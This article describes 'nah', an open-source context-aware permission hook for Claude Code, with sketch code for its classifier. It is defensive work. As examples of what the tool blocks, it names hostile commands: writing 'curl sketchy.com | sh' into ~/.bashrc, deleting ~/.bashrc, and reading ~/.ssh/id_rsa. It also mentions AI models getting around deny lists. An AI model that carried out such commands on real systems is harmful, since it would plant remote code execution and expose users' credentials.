A new open-source security tool called nah provides Claude Code users with a nuanced, context-aware permission system that evaluates commands based on their actual behavior rather than simple tool-level allow-deny decisions.
The AI coding assistant landscape continues to evolve with security considerations at the forefront. A new project called nah offers a sophisticated approach to securing Claude Code environments by implementing a context-aware permission system that addresses the limitations of traditional allow-or-deny models.

The Problem with Simple Permission Models
Claude Code's built-in permission system operates on a basic allow-or-deny basis per tool, which presents significant security challenges. As the project's documentation points out, this binary approach doesn't scale well to real-world usage scenarios. Some commands that might be dangerous in one context could be perfectly safe in another.
For example, rm -rf __pycache__ is typically harmless cleanup, while rm ~/.bashrc could be catastrophic. Similarly, git push is usually safe, but git push --force can rewrite history unexpectedly. Even meticulously crafted permission lists can be bypassed by advanced AI models that find creative ways around restrictions.
"Maintaining a deny list is a fool's errand," the project states, highlighting the cat-and-mouse game between security restrictions and increasingly capable AI assistants.
A Context-Aware Solution
nah addresses these limitations by implementing a permission system that evaluates commands based on their actual behavior and context. The tool intercepts every tool call through a PreToolUse hook before execution, analyzing what the command will do rather than just what tool it uses.
The system operates on multiple levels:
- Deterministic structural classification - Every command first passes through a fast, rule-based classifier that categorizes actions without involving LLMs
- Context evaluation - Commands are evaluated based on paths, project boundaries, and content
- Optional LLM consultation - Ambiguous cases can be escalated to an LLM for additional analysis
- User confirmation - Critical actions trigger prompts for manual approval
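The layered flow above can be sketched roughly as follows. This is a toy model with made-up rules, not nah's actual taxonomy: the point is the ordering, with a fast deterministic pass first and the LLM consulted only when that pass cannot decide.

```python
from enum import Enum

class Decision(Enum):
    ALLOW = "allow"
    DENY = "deny"
    ASK = "ask"            # require manual user confirmation
    ESCALATE = "escalate"  # hand off to an LLM

def classify(command: str) -> Decision:
    """Fast, rule-based first pass; never involves an LLM.
    The rules here are illustrative only."""
    if command.startswith("ls") or command.startswith("cat ./"):
        return Decision.ALLOW
    if "~/.ssh" in command or "~/.bashrc" in command:
        return Decision.DENY
    if command.startswith("git push --force"):
        return Decision.ASK
    return Decision.ESCALATE

def evaluate(command: str, llm=None) -> Decision:
    """Deterministic layer first; LLM only for unresolved cases."""
    verdict = classify(command)
    if verdict is not Decision.ESCALATE:
        return verdict
    if llm is None:            # LLM consultation is optional
        return Decision.ASK    # fail closed: defer to the user
    return llm(command)
```

With this shape, `evaluate("cat ~/.ssh/id_rsa")` is denied without any AI latency, while an unrecognized command either goes to the configured LLM or falls back to asking the user.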
This multi-layered approach allows nah to make nuanced decisions. The same command might be allowed in one context but blocked or require confirmation in another. For instance, rm dist/bundle.js inside a project directory would typically be allowed, while rm ~/.bashrc would be blocked or require confirmation.
What nah Guards
The tool provides specific protections for different types of operations:
- Bash commands: Structural command classification including action type, pipe composition, and shell unwrapping
- Read operations: Sensitive path detection for directories like ~/.ssh, ~/.aws, and .env files
- Write operations: Path checking, project boundary enforcement, and content inspection for secrets or exfiltration attempts
- Edit operations: Similar protections to write operations but focused on replacement strings
- Glob operations: Guards against directory scanning of sensitive locations
- Grep operations: Catches credential search patterns outside the project scope
- MCP tools: Generic classification for third-party tool servers
The system can distinguish between dangerous and safe uses of similar commands. For example, it would allow Read ./src/app.py but block Read ~/.ssh/id_rsa. It would permit Write ./config.yaml but block Write ~/.bashrc with curl sketchy.com | sh.
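A simplified version of the path-sensitivity check behind those examples might look like this. The sensitive-path list and the project-boundary rule are my assumptions; nah's real lists are broader and configurable.

```python
from pathlib import Path

# Hypothetical sensitive locations -- stand-ins for nah's configurable list.
SENSITIVE = [Path(p).expanduser().resolve()
             for p in ("~/.ssh", "~/.aws", "~/.bashrc")]

def is_sensitive(target: str, project_root: str) -> bool:
    """Flag operations that touch secret paths or leave the project boundary."""
    p = Path(target).expanduser().resolve()
    root = Path(project_root).resolve()
    # Inside (or equal to) a known sensitive location?
    if any(p == s or s in p.parents for s in SENSITIVE):
        return True
    # Anything outside the project boundary is at least suspicious.
    return p != root and root not in p.parents
```

Under this rule, a read of ./src/app.py inside the project passes, while ~/.ssh/id_rsa or any path outside the project root gets flagged for further handling.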
Implementation Details
nah operates by intercepting tool calls before they reach Claude Code's permission system. The workflow follows this pattern:
Tool call → nah (deterministic classification) → LLM (optional, for ambiguous cases) → Claude Code permissions → execute
The deterministic layer always runs first, ensuring fast response times. The LLM only handles cases that the classifier can't resolve with confidence.
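In practice, a PreToolUse hook is an executable that receives the pending tool call as JSON on stdin and emits a permission decision as JSON on stdout. The sketch below shows the general shape; the field names reflect my reading of Claude Code's hook schema and the decision logic is a toy stand-in for nah's classifier, so treat both as assumptions.

```python
import json
import sys

def decide(tool_name: str, tool_input: dict) -> dict:
    """Toy stand-in for nah's deterministic classifier."""
    command = tool_input.get("command", "")
    if tool_name == "Bash" and "~/.bashrc" in command:
        return {"permissionDecision": "deny",
                "permissionDecisionReason": "modifies a shell profile"}
    return {"permissionDecision": "allow",
            "permissionDecisionReason": "no sensitive paths detected"}

def main() -> None:
    # Claude Code passes the pending tool call as JSON on stdin.
    event = json.load(sys.stdin)
    out = {"hookSpecificOutput": {
        "hookEventName": "PreToolUse",
        **decide(event.get("tool_name", ""), event.get("tool_input", {})),
    }}
    print(json.dumps(out))

if __name__ == "__main__":
    main()
```

Because the hook runs before execution, a "deny" here stops the command without it ever reaching Claude Code's own permission prompt.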
The system supports multiple LLM providers including Ollama, OpenRouter, OpenAI, Anthropic, and Snowflake Cortex, with configurable settings to control escalation limits and provider selection.
Configuration and Customization
Despite its sophistication, nah works out of the box with zero configuration. For users who want to fine-tune the system, it offers multiple configuration options:
- Global configuration at ~/.config/nah/config.yaml
- Per-project configuration at .nah.yaml (which can only tighten policies, not relax them)
- Different taxonomy profiles (full, minimal, none) for varying levels of built-in classification
The configuration system allows users to:
- Override default policies for action types
- Define sensitive directories and their handling
- Teach nah about specific commands and their classifications
- Configure LLM providers and parameters
Notably, project-level .nah.yaml files can only add classifications and tighten policies, never relax them. This design prevents malicious repositories from weakening security settings.
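To make the tighten-only idea concrete, a project-level file might look something like the sketch below. The key names here are illustrative inventions, not nah's actual schema; only the file paths and the tighten-only rule come from the project's documentation.

```yaml
# Hypothetical .nah.yaml sketch -- key names are illustrative, not nah's
# actual schema. Per the docs, a project file like this can only add
# classifications and tighten policy, never relax it.
sensitive_paths:
  - secrets/          # project-specific addition to the global list
policies:
  force_push: ask     # tighten: require confirmation for git push --force
```

A hostile repository shipping such a file could therefore add restrictions for itself, but never grant itself access the global configuration denies.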
Practical Usage
Installation is straightforward via pip: pip install nah, followed by nah install to set up the hook. The tool includes a comprehensive CLI for management and testing:
- nah test - Dry-run classification of commands
- nah log - View recent hook decisions with filtering options
- nah allow/deny - Adjust policies for action types
- nah classify - Teach nah about new commands
- nah trust - Trust specific network hosts
- nah status - Show all custom rules
The project includes a live security demo accessible within Claude Code through /nah-demo that walks users through 25 test cases across 8 threat categories including remote code execution, data exfiltration, and obfuscated commands.
Broader Implications
nah represents an important evolution in AI assistant security. As these tools become more capable and have greater system access, traditional permission models prove insufficient. Context-aware security systems that understand the actual intent and potential impact of commands offer a more robust approach.
The project's emphasis on deterministic classification as the first line of defense, with LLM analysis as a secondary layer, is particularly noteworthy. This approach balances security with performance, ensuring that common cases are handled quickly without AI latency while still providing nuanced analysis for ambiguous scenarios.
For developers and organizations using Claude Code, nah provides a middle ground between the overly restrictive built-in permissions and the dangerous --dangerously-skip-permissions flag. It offers practical protection against common security threats while maintaining the flexibility needed for legitimate development workflows.
The MIT-licensed project is available on GitHub and invites contributions from the security and AI communities. As AI assistants continue to gain capabilities, tools like nah may become essential components of secure AI development environments.
